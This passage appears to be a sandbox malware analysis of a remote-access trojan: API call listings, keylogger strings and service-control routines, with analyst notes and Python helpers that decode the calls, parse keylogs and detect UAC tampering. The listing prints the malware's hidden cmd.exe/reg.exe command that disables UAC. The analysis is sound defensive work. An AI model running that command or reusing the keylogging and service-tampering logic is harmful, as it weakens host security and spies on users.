                                        • Part of subcall function 02A0A675: CreateFileW.KERNEL32(00000000,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,02A0A74D), ref: 02A0A6AB
                                        • Part of subcall function 02A0A675: GetFileSize.KERNEL32(00000000,00000000,?,?,?,02A0A74D), ref: 02A0A6BA
                                        • Part of subcall function 02A0A675: Sleep.KERNEL32(00002710,?,?,?,02A0A74D), ref: 02A0A6E7
                                        • Part of subcall function 02A0A675: CloseHandle.KERNEL32(00000000,?,?,?,02A0A74D), ref: 02A0A6EE
                                      • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 02A0A77C
                                      • GetFileAttributesW.KERNEL32(00000000), ref: 02A0A78D
                                      • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 02A0A7A4
                                      • PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00000012), ref: 02A0A81E
                                        • Part of subcall function 02A1C485: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02A0412F,02A65E74), ref: 02A1C49E
                                      • SetFileAttributesW.KERNEL32(00000000,00000006,00000013,02A66468,00000000,00000000,00000000), ref: 02A0A927
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$AttributesCreate$Sleep$CloseDirectoryExistsHandlePathSize
                                      • String ID:
                                      • API String ID: 3795512280-0
                                      • Opcode ID: 76cdb5a3db3ff7202f9940115ffad386a45c0978ae9979eb6b38b592db7e7a1e
                                      • Instruction ID: 8c82428eb0d23e5d479f8bc13f59c8a9196ef8ed7caa7d3bfec941ee3125d45c
                                      • Opcode Fuzzy Hash: 76cdb5a3db3ff7202f9940115ffad386a45c0978ae9979eb6b38b592db7e7a1e
                                      • Instruction Fuzzy Hash: 95516D716843045BDB19BB70EAE4AFF73AB9F80354F40081EA6469B1D1DF259909CF92
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: __freea$__alloca_probe_16_free
                                      • String ID: a/p$am/pm
                                      • API String ID: 2936374016-3206640213
                                      • Opcode ID: b97455c8c14dedee5f9389442a08906d3655a92ca49788044871efbc66b2e7fb
                                      • Instruction ID: 7264cdf9346049248c7143256783103bbd6a9bbf78074e63bfea65e098ebb7f4
                                      • Opcode Fuzzy Hash: b97455c8c14dedee5f9389442a08906d3655a92ca49788044871efbc66b2e7fb
                                      • Instruction Fuzzy Hash: B9D14571900286CBDB698F68CDC4BBAF7B1FF89304F184559E905AB252DF35D980CBA1
                                      APIs
                                      • std::_Lockit::_Lockit.LIBCPMT ref: 02A10E6E
                                      • int.LIBCPMT ref: 02A10E81
                                        • Part of subcall function 02A0E0C1: std::_Lockit::_Lockit.LIBCPMT ref: 02A0E0D2
                                        • Part of subcall function 02A0E0C1: std::_Lockit::~_Lockit.LIBCPMT ref: 02A0E0EC
                                      • std::_Facet_Register.LIBCPMT ref: 02A10EC1
                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 02A10ECA
                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 02A10EE8
                                      • __Init_thread_footer.LIBCMT ref: 02A10F29
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                      • String ID:
                                      • API String ID: 3815856325-0
                                      • Opcode ID: b011373676ab88fb9d7a1e6408d1a0c1d04b0f27214f97c1242ad295f5c7485f
                                      • Instruction ID: 120a50e0573f0af936c66312562689377ecfc55a65024501d26d26e237d59bf1
                                      • Opcode Fuzzy Hash: b011373676ab88fb9d7a1e6408d1a0c1d04b0f27214f97c1242ad295f5c7485f
                                      • Instruction Fuzzy Hash: 9D2126329D0514ABC705FBA8EA84D9E77BAEF49730B200556E900A72C0DF31A981CF94
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,00000000,?,?,?,02A1A38E,00000000), ref: 02A1AC88
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,02A1A38E,00000000), ref: 02A1AC9C
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACA9
                                      • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACDE
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACF0
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACF3
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                      • String ID:
                                      • API String ID: 493672254-0
                                      • Opcode ID: 713a894be43bb564c39a61d876d0d437c799afcc73a03cd331202d03bd7aa9eb
                                      • Instruction ID: 3aabac21b52a4b170eaa3e6fee71573bd72581ec3c24348fed28e18814bb47eb
                                      • Opcode Fuzzy Hash: 713a894be43bb564c39a61d876d0d437c799afcc73a03cd331202d03bd7aa9eb
                                      • Instruction Fuzzy Hash: FA014531586225BBD6110B78AD8DFBB3B6CDF423B0F000706F9269A1C1DF60CA02E5E0
                                      APIs
                                      • GetLastError.KERNEL32(?,02A3F720,02A3A7F5,02A3F720,02A74EF8,?,02A3CE15,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48219
                                      • _free.LIBCMT ref: 02A4824C
                                      • _free.LIBCMT ref: 02A48274
                                      • SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A48281
                                      • SetLastError.KERNEL32(00000000,FF8BC35D,02A74EF8,02A74EF8), ref: 02A4828D
                                      • _abort.LIBCMT ref: 02A48293
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ErrorLast$_free$_abort
                                      • String ID:
                                      • API String ID: 3160817290-0
                                      • Opcode ID: b30c7074d086cace88075bb93878842fbb24ddf52cf0af9547b19fd3a4183ebe
                                      • Instruction ID: 923d2d04d265672d3cad92cca0cd33ac4c326fa4803562779e4bed47a6b714cd
                                      • Opcode Fuzzy Hash: b30c7074d086cace88075bb93878842fbb24ddf52cf0af9547b19fd3a4183ebe
                                      • Instruction Fuzzy Hash: 00F0F9355C4B006EC71133247C44F5B661A9FC2B65F240A18FD3896180DF2CCC0685E0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAB5
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAC9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAD6
                                      • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAE5
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAF7
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAFA
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 6f2e4fadba4ce3177724e7ca5d91273e1c512069803d274b3b90af000bf08931
                                      • Instruction ID: 30fde4a1acf699801bbb7df8084db1ca927e0c986b293fa3efffda6d8951a5e4
                                      • Opcode Fuzzy Hash: 6f2e4fadba4ce3177724e7ca5d91273e1c512069803d274b3b90af000bf08931
                                      • Instruction Fuzzy Hash: D7F0F631981329BBD711AA24AD88EFF3B6CDF45360F000416FD098A181DF64CD56D9F0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABB9
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABCD
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABDA
                                      • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABE9
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABFB
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABFE
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 5e4f322dbaae6996fafcd59e95249043df23bdc12228e28dfaa18e09a33975b4
                                      • Instruction ID: 8592a42fd392b3c7419f0cb2fd03846afaa64f69984440d5bf5b7486b3f82306
                                      • Opcode Fuzzy Hash: 5e4f322dbaae6996fafcd59e95249043df23bdc12228e28dfaa18e09a33975b4
                                      • Instruction Fuzzy Hash: 8EF0C231981229ABD6116A64AC89EFF3B6CDF45360F400416FE099A141DF28CD16D9F0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC20
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC34
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC41
                                      • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC50
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC62
                                      • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC65
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ControlManager
                                      • String ID:
                                      • API String ID: 221034970-0
                                      • Opcode ID: 1e5e16b28bde9237b6d828000447b5991d617eb0b5ef2face4648d3066872fb7
                                      • Instruction ID: 5c6d8c32243049fc7fd34daa55b73488fa64b3e0f503e08f48a7f8ed915b2bf4
                                      • Opcode Fuzzy Hash: 1e5e16b28bde9237b6d828000447b5991d617eb0b5ef2face4648d3066872fb7
                                      • Instruction Fuzzy Hash: 47F0C231981229ABD611AA64AC88EFF3B6CDF45361F000816FE0D9A141EF28CE1699E0
                                      APIs
                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000010,00000000,00000001,?,02A1A6A0,00000000), ref: 02A1AA53
                                      • OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02A1A6A0,00000000), ref: 02A1AA68
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02A1A6A0,00000000), ref: 02A1AA75
                                      • StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02A1A6A0,00000000), ref: 02A1AA80
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02A1A6A0,00000000), ref: 02A1AA92
                                      • CloseServiceHandle.ADVAPI32(00000000,?,02A1A6A0,00000000), ref: 02A1AA95
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Service$CloseHandle$Open$ManagerStart
                                      • String ID:
                                      • API String ID: 276877138-0
                                      • Opcode ID: 94fe934595013e741923d728e4885cfc269a3808be19cac57770b02600e63419
                                      • Instruction ID: d3406a30086a867490887e3583a1dda1c6806ad00cb4394e87a093e1517217b9
                                      • Opcode Fuzzy Hash: 94fe934595013e741923d728e4885cfc269a3808be19cac57770b02600e63419
                                      • Instruction Fuzzy Hash: 6CF08271981336AFD211AB20ADC8DFF2B6CDF857A5B000C1AF945961809F68CD5AE9F1
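The five ADVAPI32 blocks above (ChangeServiceConfigW, three ControlService variants, StartServiceW) are easier to read once the numeric arguments are named: the second ControlService argument is the control code (1 = SERVICE_CONTROL_STOP, 2 = PAUSE, 3 = CONTINUE), the third ChangeServiceConfigW argument is dwStartType (4 = SERVICE_DISABLED), and the OpenServiceW access mask in each block (0x2, 0x20, 0x40, 0x10) is exactly the right the following call needs (SERVICE_CHANGE_CONFIG, SERVICE_STOP, SERVICE_PAUSE_CONTINUE, SERVICE_START). Together they give the operator a disable/stop/pause/resume/start primitive for any service by name. The annotator below is an added example, not Joe Sandbox tooling or code from the sample: it parses the report's own call-listing lines and names the winsvc.h constants. Two assumptions are labelled in the code: the listing's 000000FF for the dwServiceType/dwErrorControl arguments is taken to be a sign-extended push of -1 (SERVICE_NO_CHANGE), and the OpenSCManagerW access argument is not decoded because in the listing it merely mirrors the OpenServiceW mask, which looks like argument recovery rather than a deliberate SCM access mask.

```python
import re

# One call line of the report's "APIs" listing, e.g.
#   OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,02A1A623,00000000), ref: 02A1AAC9
CALL_RE = re.compile(
    r"^(?P<api>\w+)\.(?P<dll>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# winsvc.h constants (documented values)
SERVICE_ACCESS = {
    0x0001: "SERVICE_QUERY_CONFIG", 0x0002: "SERVICE_CHANGE_CONFIG",
    0x0004: "SERVICE_QUERY_STATUS", 0x0008: "SERVICE_ENUMERATE_DEPENDENTS",
    0x0010: "SERVICE_START", 0x0020: "SERVICE_STOP",
    0x0040: "SERVICE_PAUSE_CONTINUE", 0x0080: "SERVICE_INTERROGATE",
    0x0100: "SERVICE_USER_DEFINED_CONTROL",
}
SERVICE_CONTROL = {1: "SERVICE_CONTROL_STOP", 2: "SERVICE_CONTROL_PAUSE",
                   3: "SERVICE_CONTROL_CONTINUE", 4: "SERVICE_CONTROL_INTERROGATE"}
START_TYPE = {0: "SERVICE_BOOT_START", 1: "SERVICE_SYSTEM_START", 2: "SERVICE_AUTO_START",
              3: "SERVICE_DEMAND_START", 4: "SERVICE_DISABLED"}
SERVICE_NO_CHANGE = 0xFFFFFFFF


def parse_call(line):
    """Parse one listing line into {'api','dll','args','ref'}; args are ints,
    or None where the plugin printed '?' (value not recovered)."""
    m = CALL_RE.match(line.strip().lstrip("•").strip())
    if not m:
        return None
    args = [None if a.strip() == "?" else int(a, 16)
            for a in m["args"].split(",") if a.strip()]
    return {"api": m["api"], "dll": m["dll"], "args": args, "ref": m["ref"]}


def decode_flags(value, table):
    """Render a bitmask as 'NAME|NAME'; unknown masks fall back to hex."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else f"0x{value:X}"


def annotate(call):
    """Name the service-control constants in the calls this report lists."""
    args, api = call["args"], call["api"]

    def arg(i):
        return args[i] if i < len(args) else None

    if api == "OpenServiceW" and arg(2) is not None:
        return f"OpenServiceW: access {decode_flags(arg(2), SERVICE_ACCESS)}"
    if api == "ControlService" and arg(1) is not None:
        return f"ControlService: {SERVICE_CONTROL.get(arg(1), hex(arg(1)))}"
    if api == "ChangeServiceConfigW" and arg(2) is not None:
        st = arg(2)
        # Assumption: the listing prints 000000FF where the code pushes -1
        # (push imm8, sign-extended), i.e. SERVICE_NO_CHANGE.
        name = ("SERVICE_NO_CHANGE" if st in (0xFF, SERVICE_NO_CHANGE)
                else START_TYPE.get(st, hex(st)))
        return f"ChangeServiceConfigW: dwStartType={name}"
    if api == "StartServiceW":
        return "StartServiceW: start the opened service"
    return None


def service_capabilities(listing):
    """Return the named service operations a block of call lines performs, in order."""
    notes = []
    for line in listing.splitlines():
        call = parse_call(line)
        if call and (note := annotate(call)):
            notes.append(note)
    return notes


# Call lines copied from the report's service blocks above ('?' marks
# arguments the plugin could not resolve).
REPORT_LINES = """
• OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,?,?,02A1A38E,00000000), ref: 02A1AC9C
• ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,02A1A38E,00000000), ref: 02A1ACDE
• OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAC9
• ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,02A1A623,00000000), ref: 02A1AAE5
• OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABCD
• ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,02A1A5A3,00000000), ref: 02A1ABE9
• ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,02A1A523,00000000), ref: 02A1AC50
• OpenServiceW.ADVAPI32(00000000,00000000,00000010,?,02A1A6A0,00000000), ref: 02A1AA68
• StartServiceW.ADVAPI32(00000000,00000000,00000000,?,02A1A6A0,00000000), ref: 02A1AA80
"""

if __name__ == "__main__":
    for note in service_capabilities(REPORT_LINES):
        print(note)
```

Run against the pasted lines it prints, in order, SERVICE_CHANGE_CONFIG / SERVICE_DISABLED, SERVICE_STOP / SERVICE_CONTROL_STOP, SERVICE_PAUSE_CONTINUE / PAUSE and CONTINUE, and SERVICE_START / StartServiceW, which is the operator-facing service manager these four functions implement. Because every call opens the service by a name passed in from the caller (the first OpenServiceW argument is unresolved), the target service is chosen at runtime by the C2 operator, not fixed in the binary.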
                                      APIs
                                        • Part of subcall function 02A1361B: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,02A750E4), ref: 02A1363D
                                        • Part of subcall function 02A1361B: RegQueryValueExW.ADVAPI32(?,02A0F313,00000000,00000000,?,00000400), ref: 02A1365C
                                        • Part of subcall function 02A1361B: RegCloseKey.ADVAPI32(?), ref: 02A13665
                                        • Part of subcall function 02A1BFB7: GetCurrentProcess.KERNEL32(?,?,?,02A0DAAA,WinDir,00000000,00000000), ref: 02A1BFC8
                                      • _wcslen.LIBCMT ref: 02A1B763
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseCurrentOpenProcessQueryValue_wcslen
                                      • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                      • API String ID: 37874593-4246244872
                                      • Opcode ID: d2e56c655853772f3c4e861df7c3392cef9ed3da4e344e3a48119d78c522ef47
                                      • Instruction ID: 37382350cbcfdbf21b52e46c834238ea982695508f7477cd661a917efdbd1284
                                      • Opcode Fuzzy Hash: d2e56c655853772f3c4e861df7c3392cef9ed3da4e344e3a48119d78c522ef47
                                      • Instruction Fuzzy Hash: 6821B662A802046BDB14BAB49ED8EFE776F9F45734F04083FE406A72C1EE648D084B61
                                      APIs
                                      • GetLocalTime.KERNEL32(?,Offline Keylogger Started,02A750F0), ref: 02A0B172
                                      • wsprintfW.USER32 ref: 02A0B1F3
                                        • Part of subcall function 02A0A636: SetEvent.KERNEL32(?,?,00000000,02A0B20A,00000000), ref: 02A0A662
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: EventLocalTimewsprintf
                                      • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                      • API String ID: 1497725170-248792730
                                      • Opcode ID: f9352b03163520a858a6035582aa82ecfdab6641eaf97f31f49195aaceb84698
                                      • Instruction ID: ce76e6093ccf2ce2fae43d84c59540c6cf9ab516a7c63d78dfd2ff9c02793bcd
                                      • Opcode Fuzzy Hash: f9352b03163520a858a6035582aa82ecfdab6641eaf97f31f49195aaceb84698
                                      • Instruction Fuzzy Hash: A5117F72944118AA8B19AB94F9D48FF77BEAE08351B00011BF406960D0EF789E46CAA4
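The three strings in the block above ("[%04i/%02i/%02i %02i:%02i:%02i ", "Offline Keylogger Started", "]") are the pieces of the header line the offline keylogger writes, and the timestamp comes from GetLocalTime, so every entry is in the victim's local time and must be shifted to UTC with the host's zone before it is put on an incident timeline. The parser below is an added example for triaging a recovered keylog, not code from the report or the sample. It assumes the three strings are concatenated in that order into "[YYYY/MM/DD HH:MM:SS <title>]" with the keystroke text on the following lines (the report shows only the strings, not the layout); the sample log, window titles and key names such as [Enter] are constructed for the example.

```python
import re
from datetime import datetime

# Header line as the listing's format strings suggest when concatenated
# (assumed order: format string + title + "]").
HEADER_RE = re.compile(
    r"^\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (?P<title>.*)\]$"
)
SESSION_MARKER = "Offline Keylogger Started"


def parse_keylog(text):
    """Split an offline keylog into entries: one per header line, each carrying
    the keystroke text that follows it up to the next header."""
    entries = []
    for raw in text.splitlines():
        line = raw.rstrip("\r")
        m = HEADER_RE.match(line)
        if m:
            y, mo, d, h, mi, s = (int(x) for x in m.groups()[:6])
            entries.append({
                # victim local time: the sample uses GetLocalTime, not system time
                "time": datetime(y, mo, d, h, mi, s),
                "title": m["title"],
                "session_start": m["title"] == SESSION_MARKER,
                "keys": "",
            })
        elif entries:
            entries[-1]["keys"] += line
        # text before the first header has no timestamp context and is dropped
    return entries


def windows_matching(entries, needles):
    """Entries whose window title contains any needle (case-insensitive),
    e.g. to pull out logon dialogs or browser sign-in pages."""
    low = [n.lower() for n in needles]
    return [e for e in entries if any(n in e["title"].lower() for n in low)]


def sessions(entries):
    """Group entries by 'Offline Keylogger Started' marker; each group is one run
    of the implant (a new marker means the host was rebooted or the RAT restarted)."""
    groups = []
    for e in entries:
        if e["session_start"] or not groups:
            groups.append([])
        groups[-1].append(e)
    return groups


# Constructed sample log; titles and key names are invented for this example.
SAMPLE_LOG = """[2024/10/17 09:15:02 Offline Keylogger Started]
[2024/10/17 09:15:40 Untitled - Notepad]
meeting notes[Enter]
[2024/10/17 09:16:05 Sign in - Google Chrome]
user@example.com[Tab]hunter2[Enter]
[2024/10/17 13:02:11 Offline Keylogger Started]
[2024/10/17 13:03:00 Untitled - Notepad]
after reboot[Enter]
"""

if __name__ == "__main__":
    for e in parse_keylog(SAMPLE_LOG):
        print(e["time"].isoformat(), repr(e["title"]), repr(e["keys"]))
```

A line that begins with a bracketed key name such as "[Enter]" never matches HEADER_RE, because the header requires a four-digit year immediately after the bracket, so keystroke text is never mistaken for a header.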
                                      APIs
                                      • RegisterClassExA.USER32(00000030), ref: 02A1D55B
                                      • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 02A1D576
                                      • GetLastError.KERNEL32 ref: 02A1D580
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ClassCreateErrorLastRegisterWindow
                                      • String ID: 0$MsgWindowClass
                                      • API String ID: 2877667751-2410386613
                                      • Opcode ID: 6eac282b5a28873332b4196e42b1f7d01e0b9647c0fac7b0b377d872146cc8b2
                                      • Instruction ID: 49f9a96ab5f6c13750d1a0ab98e90407820a76ab7f82fc322259524eed28ad9c
                                      • Opcode Fuzzy Hash: 6eac282b5a28873332b4196e42b1f7d01e0b9647c0fac7b0b377d872146cc8b2
                                      • Instruction Fuzzy Hash: 5301E9B1D00229ABDB11DFD5ECC49EFBBBDEA04264F40052AF914A6240EB7599058AA0
                                      APIs
                                      • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 02A0779B
                                      • CloseHandle.KERNEL32(?), ref: 02A077AA
                                      • CloseHandle.KERNEL32(?), ref: 02A077AF
                                      Strings
                                      • C:\Windows\System32\cmd.exe, xrefs: 02A07796
                                      • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 02A07791
                                      Memory Dump Source
                                      • Source File: 0000000F.00000002.2208926041.0000000002A00000.00000040.00000400.00020000.00000000.sdmp, Offset: 02A00000, based on PE: true
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_15_2_2a00000_regsvr32.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CloseHandle$CreateProcess
                                      • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                      • API String ID: 2922976086-4183131282
                                      • Opcode ID: 1eadb1d94b70d98f78b941e0cdcaa9d4121506c49fca2c746e6147646cb91d32
                                      • Instruction ID: adb7d7dee222d880f91d288eb941bc8d056bf43373b7c45bd5ef15562ba991b4
                                      • Opcode Fuzzy Hash: 1eadb1d94b70d98f78b941e0cdcaa9d4121506c49fca2c746e6147646cb91d32
                                      • Instruction Fuzzy Hash: 36F06272D402AC76DB20AAD69C0DEDF7F7DEBC5F11F00045AF504A6040DA705014CAB0
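The CreateProcessA call above launches cmd.exe with dwCreationFlags 0x08000000 (CREATE_NO_WINDOW) to run reg.exe and set EnableLUA to 0 under HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System. Two points matter for triage: writing that HKLM key already requires an elevated token, so this is not a UAC bypass but a post-elevation disablement of UAC for every user, and the change only takes effect after a reboot, which leaves a detection window. The check below is an added example, not a Joe Sandbox signature or the sample's code: it tokenises a process-creation command line, unwraps the cmd.exe /k or /c prefix, and flags reg.exe writing a UAC policy value of 0 under HKLM. It generalises beyond the page by also covering the documented sibling values ConsentPromptBehaviorAdmin and PromptOnSecureDesktop. The event records are constructed with Sysmon Event ID 1 field names; the first reproduces the command line from the listing, the parent image regsvr32.exe is assumed from the memory dump's process name, and the PIDs are invented.

```python
import re

# UAC policy values whose data being 0 weakens or disables UAC. EnableLUA is the
# one this sample writes; the other two are documented siblings added to
# generalise the check.
UAC_POLICY_VALUES = {"enablelua", "consentpromptbehavioradmin", "promptonsecuredesktop"}
POLICY_KEY_SUFFIX = "\\software\\microsoft\\windows\\currentversion\\policies\\system"
HKLM_HIVES = ("hklm", "hkey_local_machine")


def tokenize(cmdline):
    """Split a Windows command line on whitespace, keeping quoted spans whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def basename(path):
    """Last path component, lower-cased; tolerates %windir%-style prefixes."""
    return re.split(r"[\\/]", path)[-1].lower()


def _switch_value(tokens, name):
    """Token following a reg.exe switch such as /v or /d, if present."""
    low = [t.lower() for t in tokens]
    if name in low and low.index(name) + 1 < len(low):
        return tokens[low.index(name) + 1]
    return None


def detect_uac_tamper(cmdline):
    """Return {'key','value','data'} if the command line (possibly wrapped in
    cmd.exe /k or /c) runs reg.exe to set a UAC policy value to 0 under HKLM."""
    tokens = tokenize(cmdline)
    for i, tok in enumerate(tokens):
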